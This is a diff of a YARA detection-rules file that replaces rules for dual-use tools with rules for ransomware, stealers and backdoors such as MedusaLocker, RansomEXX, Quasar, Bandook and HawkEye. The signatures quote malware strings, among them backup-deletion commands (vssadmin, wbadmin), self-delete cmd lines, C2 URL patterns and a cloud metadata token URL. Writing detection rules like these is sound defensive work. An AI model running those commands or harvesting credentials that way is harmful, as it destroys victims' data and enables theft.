-		$f7 = "main.LadonUrlScan" fullword ascii
+		$s1 = ".encrypt" fullword wide
+		$s2 = "crypted" fullword wide
+		$s3 = ".Nibiru" fullword wide
+		$s4 = "Encryption Complete" fullword wide
+		$s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii
+		$s6 = "EncryptOrDecryptFile" fullword ascii
+		$s7 = "get_hacker" ascii
+		$s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide
+		$s9 = "Once You pay,you get the KEY to decrypt files" ascii
+		$pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xface ) and 5 of ( $f* )
+		uint16( 0 ) == 0x5a4d and ( 7 of them or ( $pdb and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENC_Diskcryptor : FILE
+rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE
 {
 	meta:
-		description = "Detect DiskCryptor open encryption solution that offers encryption of all disk partitions"
-		author = "ditekSHen"
-		id = "22b25d5c-d67f-53ac-9ae8-2de077afdda9"
+		description = "Detects MedusaLocker ransomware"
+		author = "ditekshen"
+		id = "06b7645f-228d-5ec1-9b82-88caee447a5c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1209-L1232"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2506-L2537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ef0bf3b11f7e4055908518ce5b6a49e04d7002ebc3396fd2da32b4e13cf68e0"
+		logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker"
 
 	strings:
-		$x1 = "\\DiskCryptor\\DCrypt\\" ascii
-		$s1 = "Error getting %sbootloader configuration" fullword wide
-		$s2 = "loader.iso" fullword wide
-		$s3 = "Bootloader config for [%s]" fullword wide
-		$s4 = "dc_get_mbr_config" fullword ascii
-		$s5 = "dc_encrypt_iso_image" fullword ascii
-		$s6 = "dc_start_re_encrypt" fullword ascii
-		$s7 = "dc_start_encrypt" fullword ascii
-		$s8 = "_w10_reflect_" ascii
-		$d1 = "\\DosDevices\\dcrypt" fullword wide
-		$d2 = "$dcsys$_fail_%x" fullword wide
-		$d3 = "%s\\$DC_TRIM_%x$" fullword wide
-		$d4 = "\\Device\\dcrypt" fullword wide
-		$d5 = "%s\\$dcsys$" fullword wide
+		$x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii
+		$x2 = "SOFTWARE\\Medusa" wide
+		$x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii
+		$s1 = "Recovery_Instructions.mht" fullword wide
+		$s2 = "README_LOCK.TXT" fullword wide
+		$s3 = "C:\\Users\\Public\\Desktop" wide
+		$s4 = "[LOCKER] " wide
+		$s5 = "TmV3LUl0ZW0gJ2" ascii
+		$s6 = "<HEAD>=20" ascii
+		$s7 = "LIST OF ENCRYPTED FILES" ascii
+		$s8 = "KEY.FILE" ascii
+		$cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
+		$cmd2 = "vssadmin.exe delete" wide nocase
+		$cmd3 = "bcdedit.exe /set {default}" wide
+		$cmd4 = "wbadmin delete systemstatebackup" wide nocase
+		$mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
+		$mut2 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide
+		$mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide
+		$ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00
+                  74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00
+                  73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00
+                  65 00 72 00 73 00 65 00 6e }
+		$ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 4 of ( $s* ) or 3 of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 4 of ( $s* ) or 1 of ( $mut* ) ) ) or 6 of ( $s* ) or ( 1 of ( $mut* ) and 2 of ( $cmd* ) ) or ( 1 of ( $ext* ) and 5 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PRI_Installerfiletakeover : CVE_2021_41379 FILE
+rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE
 {
 	meta:
-		description = "Detect InstallerFileTakeOver CVE-2021-41379"
-		author = "ditekSHen"
-		id = "8581a306-e6d3-5ac1-a778-76c6505ee174"
+		description = "Detects RansomEXX ransomware"
+		author = "ditekshen"
+		id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1234-L1253"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2539-L2555"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0a9e53138d33494d9b2aa0271b877e405ea2e8accba7c6eeac547caaa7a7c2ea"
+		logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc"
 		score = 75
-		quality = 50
-		tags = "CVE-2021-41379, FILE"
+		quality = 75
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.RansomEXX"
 
 	strings:
-		$s1 = "splwow64.exe" fullword ascii
-		$s2 = "notepad.exe" fullword ascii
-		$s3 = "%s\\System32\\cmd.exe" fullword wide
-		$s4 = "[SystemFolder]msiexec.exe" fullword wide
-		$s5 = "microsoft plz" ascii
-		$s6 = "%TEMP%\\" fullword wide
-		$x1 = "\\InstallerFileTakeOver.pdb" ascii
-		$o1 = { 48 b8 fe ff ff ff ff ff ff 7f 48 8b f5 48 83 ce }
-		$o2 = { 4c 8d 62 10 48 c7 c7 ff ff ff ff 48 8b c7 66 0f }
-		$o3 = { ff 15 9a 59 00 00 48 8b d8 e8 ba ff ff ff 45 33 }
-		$o4 = { 49 c7 43 a8 fe ff ff ff 49 89 5b 10 48 8b 05 5a }
-		$o5 = { 66 89 7c 24 50 48 c7 c2 ff ff ff ff 48 ff c2 66 }
+		$id = "ransom.exx" ascii
+		$s1 = "!TXDOT_READ_ME!.txt" fullword wide
+		$s2 = "debug.txt" fullword wide
+		$s3 = ".txd0t" fullword wide
+		$s4 = "crypt_detect" fullword wide
+		$s5 = "powershell.exe" fullword wide
+		$s6 = "cipher.exe" fullword ascii wide
+		$s7 = "?ReflectiveLoader@@" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $o* ) ) ) or 4 of ( $s* ) or ( all of ( $o* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and ( ( $id and 3 of ( $s* ) ) or all of ( $* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PRI_Juicypotato : FILE
+rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE
 {
 	meta:
-		description = "Detect JuicyPotato"
-		author = "ditekSHen"
-		id = "2fb52598-9771-507b-a06d-7b9bc693ffee"
+		description = "Detects Quasar infostealer"
+		author = "ditekshen"
+		id = "d0d532fe-bd0a-560a-8570-f6038d694338"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1255-L1270"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2557-L2572"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43a7ac16b9633fd2e6c43ca142cd0d0e2166287bb51e1b6344119959fe054c19"
+		logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.QuasarStealer"
 
 	strings:
-		$x1 = "\\JuicyPotato.pdb" ascii
-		$x2 = "JuicyPotato v%s" fullword ascii
-		$s1 = "hello.stg" fullword wide
-		$s2 = "ppVirtualProcessorRoots" fullword ascii
-		$s3 = "Lock already taken" fullword ascii
-		$s4 = "[+] authresult %d" fullword ascii
-		$s5 = "RPC -> send failed with error: %d" fullword ascii
-		$s6 = "Priv Adjust FALSE" fullword ascii
+		$s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$s3 = "Process already elevated." fullword wide
+		$s4 = "get_PotentiallyVulnerablePasswords" fullword ascii
+		$s5 = "GetKeyloggerLogsDirectory" ascii
+		$s6 = "set_PotentiallyVulnerablePasswords" fullword ascii
+		$s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENUM_Sharpshares : FILE
+rule DITEKSHEN_MALWARE_Win_Bandook : FILE
 {
 	meta:
-		description = "Detects SharpShares multithreaded C# .NET Assembly to enumerate accessible network shares in a domain"
-		author = "ditekSHen"
-		id = "1da53e34-21a3-5b3c-885e-dcc8814ac3c8"
+		description = "Detects Bandook backdoor"
+		author = "ditekshen"
+		id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1290-L1305"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2676-L2705"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b35d6a692814e1b27ffc1db4ab124bf621c156aaf57f24796c422ec95a85715"
+		logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Bandook"
 
 	strings:
-		$s1 = "SharpShares." ascii wide
-		$s2 = "GetComputerShares" fullword ascii
-		$s3 = "userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2" wide
-		$s4 = "GetAllShares" fullword ascii
-		$s5 = "stealth:" wide
-		$s6 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))" fullword wide
-		$s7 = /\/targets|ldap|threads/ wide
-		$s8 = "entriesread" fullword ascii
+		$s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide
+		$s2 = "%s\\usd\\dv-%s.dat" fullword ascii
+		$s3 = "%sprd.dat" fullword ascii
+		$s4 = "%sfile\\shell\\open\\command" fullword ascii
+		$s5 = "explorer.exe , %s" fullword ascii
+		$f1 = "CaptureScreen" fullword ascii
+		$f2 = "StartShell" fullword ascii
+		$f3 = "ClearCred" fullword ascii
+		$f4 = "GrabFileFromDevice" fullword ascii
+		$f5 = "PutFileOnDevice" fullword ascii
+		$f6 = "ChromeInject" fullword ascii
+		$f7 = "StartFileMonitor" fullword ascii
+		$f8 = "DisableMouseCapture" fullword ascii
+		$f9 = "StealUSB" fullword ascii
+		$f10 = "DDOSON" fullword ascii
+		$f11 = "InstallMac" fullword ascii
+		$f12 = "SendCam" fullword ascii
+		$x1 = "RTC-TGUBP" fullword ascii
+		$x2 = "AVE_MARIA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $f* ) or ( 2 of ( $s* ) and 3 of ( $f* ) ) or ( all of ( $x* ) and ( 2 of ( $f* ) or 3 of ( $s* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PROX_Revsocks : FILE
+rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE
 {
 	meta:
-		description = "Detects revsocks Reverse socks5 tunneler with SSL/TLS and proxy support"
-		author = "ditekSHen"
-		id = "f85bc557-40ab-5533-8a89-a2de9bbc9ad9"
+		description = "Detects Kimsuky backdoor"
+		author = "ditekshen"
+		id = "6216b874-13f1-5283-9d17-90b7ca6996f8"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1307-L1321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2707-L2730"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4a8e68f25b7ba10b0eb9772ed4ba2b9c6566768f2b5a2859df8bac644d196bf3"
+		logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Kimsuky"
 
 	strings:
-		$s1 = "main.agentpassword" fullword ascii
-		$s2 = "main.connectForSocks" fullword ascii
-		$s3 = "main.connectviaproxy" fullword ascii
-		$s4 = "main.DnsConnectSocks" fullword ascii
-		$s5 = "main.listenForAgents" fullword ascii
-		$s6 = "main.listenForClients" fullword ascii
-		$s7 = "main.getPEMs" fullword ascii
+		$s1 = "Win%d.%d.%dx64" fullword ascii
+		$s2 = ".zip" fullword ascii
+		$s3 = ".enc" fullword ascii
+		$s4 = "&p2=a" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii
+		$s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii
+		$s7 = "/?m=b&p1=" fullword ascii
+		$s8 = "/?m=c&p1=" fullword ascii
+		$s9 = "/?m=d&p1=" fullword ascii
+		$s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii
+		$s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii
+		$s12 = "GetParent" fullword ascii
+		$s13 = "DllRegisterServer" fullword ascii
+		$dll1 = "AutoUpdate.dll" fullword ascii
+		$dll2 = "dropper-ie64.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 4 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $dll* ) and 7 of ( $s* ) ) or ( 11 of ( $* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Azbelt : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE
 {
 	meta:
-		description = "Detects azbelt for enumerating Azure related credentials primarily on AAD joined machines"
+		description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord"
 		author = "ditekSHen"
-		id = "cf9268d2-1928-51e8-9643-ee0a5bada9fa"
+		id = "18493e3d-224f-5000-8e44-9ffda9c65cf0"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1323-L1338"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2732-L2753"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71cc2b3418ea5e285adafe03fa80bade67dc3e4073fe58d42bc6190860b48b43"
+		logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent03"
 
 	strings:
-		$s1 = "@http://169.254.169.254/metadata/identity/oauth2/token?api-version=" ascii
-		$s2 = "@Partner Customer Delegated Admin Offline Processor" fullword ascii
-		$s3 = "@TargetName: " fullword ascii
-		$s4 = "httpclient.nim" fullword ascii
-		$s5 = "@DSREG_DEVICE_JOIN" fullword ascii
-		$s6 = "@.azure/msal_token_cache.bin" fullword ascii
-		$s7 = "CredEnumerateW" fullword ascii
-		$s8 = "@http://169.254.169.254/metadata/instance?api-version=" ascii
+		$delph1 = "FastMM Borland Edition" fullword ascii
+		$delph2 = "SOFTWARE\\Borland\\Delphi" ascii
+		$v1_1 = "InternetOpenUrlA" fullword ascii
+		$v1_2 = "CreateFileA" fullword ascii
+		$v1_3 = "WriteFile" fullword ascii
+		$v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii
+		$v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 }
+		$url1 = "https://discord.com/" fullword ascii
+		$url2 = "http://www.superutils.com" fullword ascii
+		$url3 = "http://www.xboxharddrive.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $delph* ) and 1 of ( $url* ) and ( all of ( $v1* ) or 1 of ( $v2* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Dontsleep : FILE
+rule DITEKSHEN_MALWARE_Win_Salfram : FILE
 {
 	meta:
-		description = "Detects Keep Host Unlocked (Don't Sleep)"
-		author = "ditekShen"
-		id = "f71bd0d5-a526-5f1e-8bd3-9e653db610a7"
+		description = "Detects Salfram executables"
+		author = "ditekSHen"
+		id = "323e1c8e-2184-5831-9af5-a460c55fbf7c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1340-L1354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2755-L2766"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8e2132d3b36c3e2d2662a586916c7e4fc029f81af08b5c18006833c4e6f772f"
+		logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort2_sid = "920085-920087"
+		snort3_sid = "920085"
+		clamav_sig = "MALWARE.Win.Trojan.Salfram"
 
 	strings:
-		$s1 = ":Repeat###DEL \"%s\"###if exist \"%s\" goto Repeat###DEL \"%s\"###" wide
-		$s2 = "powrprof.dll,SetSuspendState" wide
-		$s3 = "_selfdestruct.bat" wide
-		$s4 = "please_sleep_block_" ascii
-		$s5 = "Browser-Type: MiniBowserOK" wide
-		$s6 = "m_use_all_rule_no_sleep" ascii
-		$s7 = "BlockbyExecutionState: %d on:%d by_enable:%d" fullword wide
+		$s1 = "!This Salfram cannot be run in DOS mode." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Nsudo : FILE
+rule DITEKSHEN_MALWARE_Win_Hawkeyev9
 {
 	meta:
-		description = "Detects NSudo allowing to run processes as TrustedInstaller or System"
-		author = "ditekShen"
-		id = "9a21b923-b02e-553b-8f53-026d7034c319"
+		description = "Detects HawkEyeV9 payload"
+		author = "ditekshen"
+		id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1356-L1369"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2768-L2793"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6bcffa79ca06b0b4178d6ea256f98d917c2b19cec0b059889b8d015d226a53f9"
+		logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
+		clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9"
 
 	strings:
-		$x1 = "cmd /c start \"NSudo." wide
-		$x2 = "*\\shell\\NSudo" fullword wide
-		$x3 = "Projects\\NSudo\\Output\\Release\\x64\\NSudo.pdb" ascii
-		$s1 = "-ShowWindowMode=Hide" wide
-		$s2 = "?what@exception@@UEBAPEBDXZ" fullword ascii
-		$s3 = "NSudo.RunAs." ascii
+		$id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide
+		$id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide
+		$str1 = "_PasswordStealer" ascii
+		$str2 = "_KeyStrokeLogger" ascii
+		$str3 = "_ScreenshotLogger" ascii
+		$str4 = "_ClipboardLogger" ascii
+		$str5 = "_WebCamLogger" ascii
+		$str6 = "_AntiVirusKiller" ascii
+		$str7 = "_ProcessElevation" ascii
+		$str8 = "_DisableCommandPrompt" ascii
+		$str9 = "_WebsiteBlocker" ascii
+		$str10 = "_DisableTaskManager" ascii
+		$str11 = "_AntiDebugger" ascii
+		$str12 = "_WebsiteVisitorSites" ascii
+		$str13 = "_DisableRegEdit" ascii
+		$str14 = "_ExecutionDelay" ascii
+		$str15 = "_InstallStartupPersistance" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or all of ( $s* ) or 4 of them )
+		int16 ( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 5 of ( $str* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ligolo : FILE
+rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE
 {
 	meta:
-		description = "Detects Ligolo tool for establishing SOCKS5 or TCP tunnels from a reverse connection"
+		description = "Detects HyperBro (class names) payload"
 		author = "ditekSHen"
-		id = "cc461fd1-9a2f-59ce-af74-a0f55b8850b1"
+		id = "539b796d-297b-5e2f-84df-282ceaa57bd4"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1371-L1385"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2795-L2813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b515dc184013c2f67d37e42d7172e2471b3a93c94024be12c7f587296287282d"
+		logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.HyperBro"
 
 	strings:
-		$p1 = "/ligolo/main.go" ascii
-		$p2 = "/armon/go-socks5" ascii
-		$s1 = "main.StartLigolo" fullword ascii
-		$s2 = "main.handleRelay" fullword ascii
-		$s3 = "main.startSocksProxy" fullword ascii
-		$s4 = "_main.tlsFingerprint" fullword ascii
-		$s5 = "main.verifyTlsCertificate" fullword ascii
+		$s1 = "VTClipboardInfo" ascii wide
+		$s2 = "VTClipboardMgr" ascii wide
+		$s3 = "VTFileRename" ascii wide
+		$s4 = "VTFileRetime" ascii wide
+		$s5 = "VTKeyboardInfo" ascii wide
+		$s6 = "VTKeyboardMgr" ascii wide
+		$s7 = "VTRegeditKeyInfo" ascii wide
+		$s8 = "VTRegeditMgr" ascii wide
+		$s9 = "VTRegeditValueInfo" ascii wide
+		$s10 = "VTFileDataRes" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( all of ( $p* ) and 1 of ( $s* ) ) or all of ( $s* ) or ( 1 of ( $p* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 9 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Extpassword : FILE
+rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE
 {
 	meta:
-		description = "Detects ExtPassword External Drive Password Recovery"
+		description = "Detects unknown/unidentified Linux malware"
 		author = "ditekSHen"
-		id = "bb06d2c1-964d-5a3d-a741-09b8ef5ac7fa"
+		id = "24c6ff35-9378-5a6b-90d1-9740917b1b72"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1387-L1403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2815-L2836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "525530cb7e9f44be0408fd710306f90056b1b6b9a9e4779d8c1eb1ddef443fb0"
+		logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "ExtPassword!" fullword wide
-		$s2 = "GReading Chrome password file: %s" fullword wide
-		$s3 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy%d" fullword wide
-		$s4 = "2015-07-27 13:49:41 b8e92227a469de677a66da62e4361f099c0b79d0" ascii
-		$s5 = "metadata WHERE id = 'password'" ascii
-		$s6 = /Scanning\s(Credentials\sfolder|Credentials\sfolder|Firefox\sand\sother\sMozilla\sWeb\sbrowsers|Chromium-based\Web\browsers|Outlook\saccounts|Windows\sVault|dialup\/VPN\sitems|wireless\skeys|Windows\ssecurity\squestions|vault\spasswords)/ wide
-		$s7 = "lhelp32Snapsho" fullword ascii
-		$s8 = "SELECT origin_" fullword ascii
-		$s9 = "password#Ck" fullword ascii
+		$f1 = "%sresponse.php?status" ascii
+		$f2 = "%supstream.php?mid=%s&os=%s" ascii fullword
+		$f3 = "%supstream.php?tid=%" ascii
+		$f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword
+		$f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword
+		$s1 = "lock:%i usable num:%i n:%i" fullword ascii
+		$s2 = "tid:%.*s tNumber:%i" fullword ascii
+		$s3 = "init.php" fullword ascii
+		$s4 = "mod_drone" fullword ascii
+		$s5 = "new_mid" fullword ascii
+		$s6 = "&exists[]=" fullword ascii
+		$s7 = "&mod[]=" fullword ascii
+		$s8 = "shutdown" fullword ascii
+		$s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* )
+		uint16( 0 ) == 0x457f and ( 3 of ( $f* ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngrok : FILE
+rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE
 {
 	meta:
-		description = "Detects Ngrok"
+		description = "Detects unknown/unidentified Linux malware"
 		author = "ditekSHen"
-		id = "fc0a0de8-b68b-5b6b-a222-bbc031ebabd3"
+		id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
